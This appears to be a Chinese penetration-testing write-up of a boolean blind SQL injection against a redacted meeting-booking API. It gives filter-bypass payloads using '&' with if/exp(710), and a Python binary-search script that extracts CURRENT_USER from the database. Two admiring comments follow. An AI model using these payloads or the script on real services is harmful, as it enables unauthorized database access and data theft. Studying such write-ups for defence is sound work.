0x01判断注入
正常请求
为参数office添加单引号,页面提示未知级应用错
猜测语句大概如下
select xxx from xxx where office='wankezhongxin''
两个单引号正常
大概语句如下
select xxx from xxx where office='wankezhongxin'''
0x02 注入方式
因为有回显一开始打算走联合所以这里先想尝试一下先注释
wankezhongxin'#
但是测试了许多种姿势去注释都没成功
wankezhongxin'#
wankezhongxin'--+
wankezhongxin')#
wankezhongxin')--+
.....
然后这里我就打算尝试能不能闭合了,还是提示错误
wankezhongxin'and'1'='1
此时猜测可能代码层拦截或者过滤了什么
将and替换为& 或-+ * / ^ | 都可以
然后就是构造出true跟false两种状态,这里使用exp(1) 跟exp(710) 配合if ,注: exp(710) 在mysql会错误,这里1=1返回成功
'& if(1=1,exp(1),exp(710)) &'
1=2错误
0x03 获取用户名
这里测试的时候 user() database() 等全部错误,这里通过CURRENT_USER查询用户名跟user()同理
手动测试出长度为21
'& if(length(CURRENT_USER)=21,exp(1),exp(710)) &'1
写二分脚本出具体数据
import requests
import time
name=''
no=r'101'
for j in range(1,22):
l = 32
h = 127
while abs(l-h)>1:
i=int((l+h)/2)
url = "https://xxxxxx.com"
headers = {"Connection": "close", "sec-ch-ua": "\"Google Chrome\";v=\"89\", \"Chromium\";v=\"89\", \";Not A Brand\";v=\"99\"", "Accept": "application/json, text/plain, */*", "empId": "20228530", "sec-ch-ua-mobile": "?0", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "Origin": "https://XXXXX", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Dest": "empty", "Referer": "XXXXXXXX", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Content-Type": "application/json;charset=UTF-8"}
burp0_json={"city": "shanghai", "endTime": "24:00", "meetingDay": "2022-05-09", "office": "'& if(ascii(substr(CURRENT_USER,"+str(j)+","+str(i)+"))>"+str(i)+",exp(1),exp(710)) &'1", "startTime": "9:00"}
r=requests.post(url, headers=headers, json=burp0_json)
time.sleep(0.2)
if not no in r.text:
l = i
else:
h = i
name += chr(h)
print(chr(h))
print(name)
运行结果
2 comments
太强了
观摩大佬来了